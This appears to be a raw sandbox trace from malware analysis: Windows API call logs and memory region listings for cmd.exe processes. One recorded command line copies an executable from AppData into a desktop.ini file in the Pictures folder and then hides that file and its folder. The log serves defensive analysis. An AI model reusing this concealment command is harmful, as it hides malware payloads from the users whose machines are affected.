[0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] GetFileType (hFile=0x4c) returned 0x1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] GetFileType (hFile=0x4c) returned 0x1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] GetFileType (hFile=0x4c) returned 0x1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] GetFileType (hFile=0x4c) returned 0x1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.991] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.991] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] GetFileType (hFile=0x4c) returned 0x1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] GetFileType (hFile=0x4c) returned 0x1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.993] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.993] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] GetFileType (hFile=0x4c) returned 0x1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] GetFileType (hFile=0x4c) returned 0x1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] GetFileType (hFile=0x4c) returned 0x1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.994] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.994] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.996] GetFileType (hFile=0x4c) returned 0x1 [0144.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.996] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.996] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.996] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x32, lpOverlapped=0x0) returned 1 [0144.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.996] GetFileType (hFile=0x4c) returned 0x1 [0144.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.996] GetFileType (hFile=0x4c) returned 0x1 [0144.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.996] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x32, lpOverlapped=0x0) returned 1 [0144.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.996] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.996] _close (_FileHandle=4) returned 0 [0144.996] FindNextFileW (in: hFindFile=0x3e0e78, lpFindFileData=0x20ee7c | out: lpFindFileData=0x20ee7c) returned 0 [0144.997] GetLastError () returned 0x12 [0144.997] FindClose (in: hFindFile=0x3e0e78 | out: hFindFile=0x3e0e78) returned 1 [0144.997] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0144.998] _close (_FileHandle=3) returned 0 [0144.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.998] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.998] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.998] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.998] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.998] SetConsoleInputExeNameW () returned 0x1 [0144.999] GetConsoleOutputCP () returned 0x1b5 [0144.999] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.999] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.999] exit (_Code=0) Process: id = "197" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16de0" os_pid = "0x954" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17200 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17201 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17202 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17203 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 17204 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17205 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17206 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17207 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17208 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 17209 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17432 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17433 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17434 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17435 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 17436 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 17437 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17438 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17439 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17440 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17441 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17442 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17443 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17444 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17445 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17446 start_va = 0x430000 end_va = 0x4f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 17447 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17448 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17449 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 17450 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 17451 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 17452 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 17453 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 17454 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17455 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 17456 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 255 os_tid = 0x8a8 [0145.252] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff04 | out: lpSystemTimeAsFileTime=0x18ff04*(dwLowDateTime=0x9082d8e0, dwHighDateTime=0x1d440a9)) [0145.252] GetCurrentProcessId () returned 0x954 [0145.252] GetCurrentThreadId () returned 0x8a8 [0145.252] GetTickCount () returned 0x2d44e [0145.252] QueryPerformanceCounter (in: lpPerformanceCount=0x18fefc | out: lpPerformanceCount=0x18fefc*=20204109109) returned 1 [0145.252] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0145.252] __set_app_type (_Type=0x1) [0145.252] __p__fmode () returned 0x76b331f4 [0145.253] __p__commode () returned 0x76b331fc [0145.253] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0145.253] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0145.253] GetCurrentThreadId () returned 0x8a8 [0145.253] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8a8) returned 0x38 [0145.253] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0145.253] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0145.253] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.253] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0145.253] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe94 | out: phkResult=0x18fe94*=0x0) returned 0x2 [0145.253] VirtualQuery (in: lpAddress=0x18fecb, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.253] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0145.253] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0145.253] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.253] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0145.253] GetConsoleOutputCP () returned 0x1b5 [0145.254] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0145.254] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0145.254] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.254] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0145.254] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.254] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0145.254] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.254] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0145.254] _get_osfhandle (_FileHandle=0) returned 0x3 [0145.254] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0145.254] _get_osfhandle (_FileHandle=0) returned 0x3 [0145.254] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0145.254] GetEnvironmentStringsW () returned 0x3404a0* [0145.255] FreeEnvironmentStringsW (penv=0x3404a0) returned 1 [0145.255] GetEnvironmentStringsW () returned 0x3404a0* [0145.255] FreeEnvironmentStringsW (penv=0x3404a0) returned 1 [0145.255] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", 